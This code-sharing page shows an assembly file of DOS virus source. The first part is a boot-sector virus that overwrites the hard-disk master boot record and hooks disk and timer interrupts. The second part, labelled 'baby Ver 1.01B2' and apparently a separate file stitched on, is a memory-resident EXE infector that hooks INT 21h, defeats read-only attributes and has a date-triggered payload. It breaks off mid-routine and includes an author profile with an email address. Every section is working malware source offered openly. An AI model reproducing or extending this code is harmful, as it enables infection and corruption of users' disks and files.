📄 vv3.asm
字号:
CSEG SEGMENT
ASSUME CS:CSEG
BEGIN: MOV AX,CS
CMP AX,0
JZ START
JMP FILE
;********************************** DATA
DATE DB 00H
PZ DB 77H
TIME DW 200H
JMPA DW 7C00H
DW 0000H
JMPN DW OFFSET NEXT
DW 0020H
FN DB 'PLAY.COM',0
;************************************
START: XOR AX,AX
MOV DS,AX
MOV SS,AX
MOV ES,AX
MOV SP,7C00H
MOV AX,DS:[20H] ;SAVE INT 8H
MOV DS:[180H],AX
MOV AX,DS:[22H]
MOV DS:[182H],AX
MOV SI,SP
MOV DI,0200H
MOV CX,0200H
CLD
REP MOVSB
MOV BX,OFFSET JMPN+7C00H
JMP DWORD PTR CS:[BX]
NEXT: MOV AX,OFFSET NEW08 ;MODI INT 8H
MOV DS:[20H],AX
MOV AX,0020H
MOV DS:[22H],AX
MOV BX,0600H
MOV AX,0201H
MOV CX,0001H
MOV DX,0080H
INT 13H
CMP BYTE PTR ES:[PZ+0600H],077H
JZ NC
MOV AX,0301H
MOV CX,0017H
MOV DX,0080H
INT 13H
MOV SI,0200H
MOV DI,0600H
MOV CX,0200H
CLD
REP MOVSB
MOV AX,0301H
MOV CX,0001H
MOV DX,0080H
INT 13H
NC: MOV BX,7C00H
MOV AX,0201H
MOV CX,0017H
MOV DX,0080H
INT 13H
MOV AH,04H
INT 1AH
MOV CS:[DATE],DL
MOV BX,OFFSET JMPA
JMP DWORD PTR CS:[BX]
;***********************************RUN HD BOOTER PRG
NEW08: PUSH AX
PUSH DS
DEC CS:[TIME]
JNZ I08
XOR AX,AX
MOV DS,AX
MOV AX,DS:[4CH]
MOV DS:[184H],AX
MOV AX,DS:[4EH]
MOV DS:[186H],AX
MOV AX,OFFSET GR ;MODI INT 8H
MOV DS:[20H],AX
MOV AX,OFFSET NEW13
MOV DS:[4CH],AX
MOV AX,OFFSET NEWF
MOV DS:[94H],AX
MOV AX,0020H
MOV DS:[22H],AX
MOV DS:[4EH],AX
MOV DS:[96H],AX
MOV CS:[TIME],200H
I08: POP DS
POP AX
INT 60H
IRET
;***************************************
NEW13: CMP AH,02H
JZ CNE
CMP AH,03H
JNZ I13
CMP DL,00H
JNZ CNE
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH CS
POP ES
MOV AX,0301H
XOR BX,BX
MOV CX,0001H
MOV DX,BX
INT 61H
POP ES
POP DX
POP CX
POP BX
POP AX
JMP I13
CNE: CMP DX,0080H
JNZ I13
CMP CX,0001H
JNZ I13
MOV CX,0017H
I13: INT 61H
IRET
;*******************************************
NEWF: PUSH CS
POP DS
MOV DX,OFFSET FN
MOV CX,00000001B
MOV AH,3CH
INT 21H
MOV BX,AX
MOV AH,40H
MOV CX,400H
XOR DX,DX
INT 21H
MOV AH,3EH
INT 21H
MOV AX,0003H
INT 10H
JMP NCF
GR: PUSH AX
PUSH BX
PUSH CX
MOV AX,0900H
MOV CX,0001H
CMP CS:[DATE],15H
JZ GR1
MOV BX,111B
GR1: INT 10H
NG: POP CX
POP BX
POP AX
INT 60H
IRET
;************************************
FILE: PUSH CS
POP ES
XOR AX,AX
MOV DS,AX
CMP BYTE PTR DS:[200H+PZ],77H
JZ NCF
MOV AH,77H
MOV DS:[200H+PZ],AH
MOV BX,0300H
MOV AX,0201H
MOV CX,0001H
MOV DX,0080H
INT 13H
MOV AX,0301H
MOV CX,0017H
MOV DX,0080H
INT 13H
PUSH CS
POP DS
MOV SI,0100H
MOV DI,BX
MOV CX,01B0H ;CX 1B0H
CLD
REP MOVSB
MOV AX,0301H
MOV CX,0001H
MOV DX,0080H
INT 13H
NCF: MOV AH,4CH
INT 21H
CSEG ENDS
END BEGIN
;姓名:展姚
;性别:女
;年龄:17
;英文名:cat
;主要作品:X-cat,i-worm.snw12等
;e-mail:suruixuan1@sina.com
;================== virus: baby Ver 1.01B2================
;=================== write begin: 2-7-2000 =================
;=================== finished : 2-7-2000 =================
;instruction:
; I . The virus keep in memory (hook int 21h)
;
; II . It only infect EXE file
;
; III. Only when infected file larger than
; 1980 bytes,the virus would infect it.
;
; IV . The infected Mark is the infected file
; time was set TIME: SECOND => 12'22''
;
; * V . The virus can break READ_ONLY ATTRIB!!!
;
; VI . The virus keeping in memory's Mark can
; get in this way :
; + MOV AX,30AE
; + INT 21
;
; * CX=04C6 => VIRUS has already been in memory
; * else => VIRUS hasn't been in memory
;===============================================================
; .radix 16
; .model tiny
; .286c
; .code
; org 0
start:
push es ;把原来的 PSP 压入栈堆
call position ;呼叫 POSITION
position: ;其实还可以用中断返回的方法读取当前偏移(反 DEBUG ^o^ )
pop si ;得到偏移 SI
sub si,position-start ;得到入口偏移,存入SI
push si ;SI 入栈
mov ax,30AE;取 DOS 版本号(AE为通知同伴)
int 21;实际为判断是否已驻留
cmp cx,04c6;CX=04C6 表明已驻留
jne install;不等,则驻留
jmp run_host;等,则运行原程序
install:
;================================================================
;You can add active code here: Don't too cruel!
;================================================================
active_check:
mov ah,2a;取日期
int 21
cmp dx,0c16;是否为 12月22日
jz active;是,则发作
jmp no_active;不是,则转
active:
push cs
pop ds;置DS=CS
push si
mov bl,COLOR1
mov dx,offset active_mess-start;计算发作信息绝对偏移
add si,dx;计算实际地址
call write_on_screen ;显示发作信息
mov ah,00 ;读一字符后继续
int 16
pop si
push si
mov bl,COLOR2
mov dx,offset active_other_mess-start
add si,dx
call write_on_screen
mov ah,00 ;读一字符后继续
int 16
pop si
jmp run_host
;================================================================
no_active:
mov ah,52 ;取磁盘缓冲区地址
int 21
mov bx,es:[bx-2] ;取第一个 MCB 地址
xor di,di ;清DI
loop_search:
mov es,bx ;查找最后一个MCB地址
add bx,word ptr es:[di+3]
inc bx
cmp byte ptr es:[di],5a
jnz loop_search
;================Found Last MCB=========
mov bx,es ;保存找到的最后一个MCB地址
mov ax,word ptr es:[di+3] ;取最后一个MCB大小
sub ax,vir_para ;剪去自己的PARA
jnc keep_in_memory ;溢出则表明不够驻留
jmp run_host ;否则继续
keep_in_memory:
mov word ptr es:[di+3],ax ;改写最后一个MCB大小
add bx,ax ;计算驻留区段地址
inc bx
mov es,bx ;并送入ES
push cs
pop ds ;令DS=CS
mov cx,vir_bytes ;将自己搬移
cld
rep movsb
;===============hook int 21============
; The virus in memory address is:[BX:0]
;======================================
xor si,si
mov ds,si ;挂接中断向量 21
mov dx,offset new_int21-start
cli
xchg ds:word ptr [21*4],dx
xchg ds:word ptr [21*4+2],bx
mov es:word ptr oldint21,dx
mov es:word ptr oldint21+2,bx
sti
;==============run host================
run_host:
push cs
pop ds
pop si
mov di,offset old_header-start
add di,si
mov al,byte ptr [di] ;将OLD_HEADER前两个字符相加
add al,byte ptr [di+1] ;后送入AL
cmp al,0a7 ;比较AL是否等于0A7
jne run_com ;(4D+5A=0A7)
jmp run_exe
run_com:
;=======================================
;You can add run .com file here!
;=======================================
int 20
run_exe:
mov di,offset old_header-start
add di,si ;将OLD_HEADER 地址送入DI
pop cx ;原PSP出栈
mov dx,cx
add dx,10 ;原PSP +10H
mov ax,word ptr [di+0e] ;原程序SS 偏移送入AX
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -